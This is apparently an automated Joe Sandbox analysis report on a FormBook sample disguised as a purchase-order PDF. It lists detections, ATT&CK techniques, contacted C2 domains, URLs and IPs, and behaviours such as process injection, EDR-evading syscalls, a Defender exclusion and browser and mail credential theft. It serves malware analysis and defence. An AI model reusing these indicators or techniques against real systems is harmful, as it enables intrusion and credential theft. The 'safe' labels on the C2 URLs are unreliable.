                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552610 Sample: New PO [FK4-7173].pdf.exe Startdate: 09/11/2024 Architecture: WINDOWS Score: 100 35 www.maviro.xyz 2->35 37 www.winspinoffr.pro 2->37 39 21 other IPs or domains 2->39 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 55 11 other signatures 2->55 10 New PO [FK4-7173].pdf.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\...33ew PO [FK4-7173].pdf.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 New PO [FK4-7173].pdf.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 MKVNVRSuoK.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 shutdown.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 MKVNVRSuoK.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.maviro.xyz 67.223.117.142, 50010, 50011, 50012 VIMRO-AS15189US United States 27->41 43 www.jllllbx.top 156.234.28.94, 50034, 50035, 50036 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 27->43 45 10 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                New PO [FK4-7173].pdf.exe53%ReversingLabsWin32.Trojan.Generic
                New PO [FK4-7173].pdf.exe33%VirustotalBrowse
                New PO [FK4-7173].pdf.exe100%AviraHEUR/AGEN.1309789
                New PO [FK4-7173].pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                estrela-b.online0%VirustotalBrowse
                t95yd.top0%VirustotalBrowse
                www.tubetrexhd.buzz1%VirustotalBrowse
                7fh27o.vip2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.tubetrexhd.buzz/2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.mjmegartravel.online/n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.thefokusdong43.click/21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w==0%Avira URL Cloudsafe
                http://www.7fh27o.vip/9lti/0%Avira URL Cloudsafe
                http://www.winspinoffr.pro/2493/0%Avira URL Cloudsafe
                http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ0%Avira URL Cloudsafe
                http://www.winspinoffr.pro/2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw==0%Avira URL Cloudsafe
                http://www.jllllbx.top/gv4o/0%Avira URL Cloudsafe
                http://www.mjmegartravel.online/n1dp/0%Avira URL Cloudsafe
                http://www.7fh27o.vip/9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.maviro.xyz/hcih/0%Avira URL Cloudsafe
                http://www.t95yd.top/fjmy/0%Avira URL Cloudsafe
                http://www.sonoscan.org/xlhb/0%Avira URL Cloudsafe
                http://www70.tubetrexhd.buzz/0%Avira URL Cloudsafe
                http://www.digitaladpro.shop/q6od/0%Avira URL Cloudsafe
                http://www.estrela-b.online/e3rr/0%Avira URL Cloudsafe
                http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW0%Avira URL Cloudsafe
                http://www.thefokusdong43.click/21bn/0%Avira URL Cloudsafe
                http://www.energyparks.net/fdhm/0%Avira URL Cloudsafe
                http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoi0%Avira URL Cloudsafe
                http://www.energyparks.net/fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.maviro.xyz/hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.sonoscan.org/xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A==0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/ylto/0%Avira URL Cloudsafe
                http://www.eyecatch.pro/42c3/0%Avira URL Cloudsafe
                http://www.jllllbx.top0%Avira URL Cloudsafe
                http://www.digitaladpro.shop/q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4F0%Avira URL Cloudsafe
                http://www.moneta.life/t61z/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                estrela-b.online
                		162.241.63.77
                		truefalseunknown
                ghs.google.com
                		172.217.16.211
                		truefalse
                  		high
                  t95yd.top
                  		38.47.207.164
                  		truefalseunknown
                  www.tubetrexhd.buzz
                  		194.195.220.41
                  		truefalseunknown
                  7fh27o.vip
                  		3.33.130.190
                  		truefalseunknown
                  thefokusdong43.click
                  		172.96.191.232
                  		truefalse
                    		unknown
                    www.maviro.xyz
                    		67.223.117.142
                    		truetrue
                      		unknown
                      www.jllllbx.top
                      		156.234.28.94
                      		truefalse
                        		high
                        www.eyecatch.pro
                        		217.160.0.220
                        		truefalse
                          		unknown
                          mjmegartravel.online
                          		76.223.67.189
                          		truefalse
                            		unknown
                            www.winspinoffr.pro
                            		167.172.133.32
                            		truefalse
                              		unknown
                              www.moneta.life
                              		13.248.169.48
                              		truefalse
                                		unknown
                                www.sonoscan.org
                                		13.248.169.48
                                		truefalse
                                  		unknown
                                  www.omnibizlux.biz
                                  		167.172.133.32
                                  		truefalse
                                    		unknown
                                    energyparks.net
                                    		3.33.130.190
                                    		truefalse
                                      		unknown
                                      www.7fh27o.vip
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.digitaladpro.shop
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.mjmegartravel.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.energyparks.net
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.rka6460.online
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.thefokusdong43.click
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.t95yd.top
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.estrela-b.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.winspinoffr.pro/2493/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.7fh27o.vip/9lti/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thefokusdong43.click/21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mjmegartravel.online/n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.winspinoffr.pro/2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jllllbx.top/gv4o/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tubetrexhd.buzz/2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.omnibizlux.biz/ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.7fh27o.vip/9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.maviro.xyz/hcih/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sonoscan.org/xlhb/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thefokusdong43.click/21bn/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mjmegartravel.online/n1dp/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.estrela-b.online/e3rr/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.t95yd.top/fjmy/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.digitaladpro.shop/q6od/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.omnibizlux.biz/ylto/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.energyparks.net/fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.digitaladpro.shop/q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.energyparks.net/fdhm/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sonoscan.org/xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.eyecatch.pro/42c3/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.maviro.xyz/hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4Ffalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.moneta.life/t61z/false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabshutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQshutdown.exe, 00000007.00000002.4473736841.0000000004452000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003D42000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PWshutdown.exe, 00000007.00000002.4473736841.0000000004C2C000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.000000000451C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www70.tubetrexhd.buzz/firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoishutdown.exe, 00000007.00000002.4475619589.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473736841.0000000003954000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchshutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.jllllbx.topMKVNVRSuoK.exe, 00000009.00000002.4475014817.00000000052F8000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew PO [FK4-7173].pdf.exe, 00000000.00000002.2018067179.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.217.16.211
                                                                        		ghs.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        217.160.0.220
                                                                        		www.eyecatch.proGermany
                                                                        		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                        194.195.220.41
                                                                        		www.tubetrexhd.buzzGermany
                                                                        		6659NEXINTO-DEfalse
                                                                        67.223.117.142
                                                                        		www.maviro.xyzUnited States
                                                                        		15189VIMRO-AS15189UStrue
                                                                        13.248.169.48
                                                                        		www.moneta.lifeUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        167.172.133.32
                                                                        		www.winspinoffr.proUnited States
                                                                        		14061DIGITALOCEAN-ASNUSfalse
                                                                        76.223.67.189
                                                                        		mjmegartravel.onlineUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        162.241.63.77
                                                                        		estrela-b.onlineUnited States
                                                                        		46606UNIFIEDLAYER-AS-1USfalse
                                                                        38.47.207.164
                                                                        		t95yd.topUnited States
                                                                        		174COGENT-174USfalse
                                                                        172.96.191.232
                                                                        		thefokusdong43.clickCanada
                                                                        		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGfalse
                                                                        3.33.130.190
                                                                        		7fh27o.vipUnited States
                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                        156.234.28.94
                                                                        		www.jllllbx.topSeychelles
                                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1552610
                                                                        Start date and time:2024-11-09 05:34:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 53s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:10
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:New PO [FK4-7173].pdf.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.rans.troj.spyw.evad.winEXE@10/7@16/12
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 93%
                                                                        • Number of executed functions: 219
                                                                        • Number of non-executed functions: 242
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        23:34:54API Interceptor1x Sleep call for process: New PO [FK4-7173].pdf.exe modified
                                                                        23:34:56API Interceptor11x Sleep call for process: powershell.exe modified
                                                                        23:35:51API Interceptor11167663x Sleep call for process: shutdown.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        217.160.0.220mm.exeGet hashmaliciousUnknownBrowse
                                                                        • www.eyecatch.pro/ai53/
                                                                        STATEMENT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?7nwhw=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3Y5abrTYjVk&ML=EZBXFN7pQ8l
                                                                        CONTRACT SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL
                                                                        P.O #RFQ7787HG00.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?rDHxb=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&Wr=JhnHMfqPY
                                                                        PDF Purchase Order #RFQ7787HG00.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?jJE=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3UAW6HTPlJ12dgGJw==&wXO=O2Mtwpn
                                                                        PURCHASE ORDER REQUIREMENT.exeGet hashmaliciousFormBookBrowse
                                                                        • www.votelaura.info/s5cm/?_JE=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W04DKKLrCE0j&-Zhl=8pd8ZrPp1lL8wR
                                                                        194.195.220.41SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                        • www.gemtastic.shop/junu/
                                                                        Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                                        • www.techcables.shop/0hup/
                                                                        TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                        • www.ytonetgearhub.shop/l8y2/
                                                                        swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.cheapdesklamp.shop/9nq7/
                                                                        67.223.117.142SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                        • www.flikka.site/brrb/
                                                                        proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                        • www.jorbaq.top/saaz/
                                                                        DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/ak8m/
                                                                        SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/yhso/
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/ak8m/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.jllllbx.topRO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                        • 156.234.28.94
                                                                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                        • 156.234.28.94
                                                                        INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                        • 156.234.28.94
                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                        • 156.234.28.94
                                                                        OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                        • 156.234.28.94

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ONEANDONE-ASBrauerstrasse48DEDigiturk.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 217.160.0.3
                                                                        hiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 217.160.158.130
                                                                        AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.160.0.60
